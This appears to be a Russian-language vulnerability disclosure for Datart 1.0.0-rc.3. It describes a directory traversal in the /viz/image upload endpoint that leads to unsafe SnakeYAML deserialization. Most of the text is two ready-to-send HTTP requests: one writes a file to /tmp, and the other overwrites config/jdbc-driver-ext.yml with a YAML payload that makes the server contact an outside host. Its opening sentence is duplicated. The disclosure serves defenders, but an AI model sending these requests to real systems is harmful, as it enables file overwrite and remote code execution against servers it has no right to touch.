
Datart 1.0.0-rc.3 уязвим к обходу каталога (Directory Traversal) в интерфейсе POST /viz/image, поскольку сервер напрямую использует MultipartFile.transferTo() для сохранения загруженного файла по пути, контролируемому пользователем, и не выполняет строгую проверку имени файла.
Datart 1.0.0-rc.3 уязвим к обходу каталога в интерфейсе POST /viz/image, так как сервер напрямую использует MultipartFile.transferTo() для сохранения загруженного файла в путь, контролируемый пользователем, и не выполняет строгую проверку имени файла.
POST /api/v1/files/viz/image?ownerType=DASHBOARD&ownerId=66822c13a9bc4381923456c11339497e&fileName=../../../../../../../../tmp/1 HTTP/1.1
Host: test.com
Accept-Language: zh-CN
Accept: application/json, text/plain, */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySInMdoLRiubl32BW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Length: 4646
------WebKitFormBoundarySInMdoLRiubl32BW
Content-Disposition: form-data; name="file"; filename="1.jpg"
Content-Type: image/jpeg
xxxxx
------WebKitFormBoundarySInMdoLRiubl32BW--
Datart 1.0.0-rc. 3 уязвим к обходу каталога. Обработка файлов конфигурации в приложении позволяет злоумышленникам загружать произвольные YAML-файлы по пути config/jdbc-driver-ext. yml. Приложение разбирает этот файл с помощью небезопасного метода load() или loadAs() библиотеки SnakeYAML без санитизации входных данных. Это приводит к десериализации YAML-содержимого, контролируемого злоумышленником, и к произвольной инстанциации классов. При определённых условиях это может быть использовано для удалённого выполнения кода (RCE).
POST /api/v1/files/viz/image?ownerType=DASHBOARD&ownerId=66822c13a9bc4381923456c11339497e&fileName=../../../../../config/jdbc-driver-ext.yml HTTP/1.1
Host: test.com
Accept-Language: zh-CN
Accept: application/json, text/plain, */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySInMdoLRiubl32BW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Length: 4646
------WebKitFormBoundarySInMdoLRiubl32BW
Content-Disposition: form-data; name="file"; filename="1.jpg"
Content-Type: image/jpeg
{!!java.net.URL ["http://test.eyes.sh/"]: 1}
------WebKitFormBoundarySInMdoLRiubl32BW--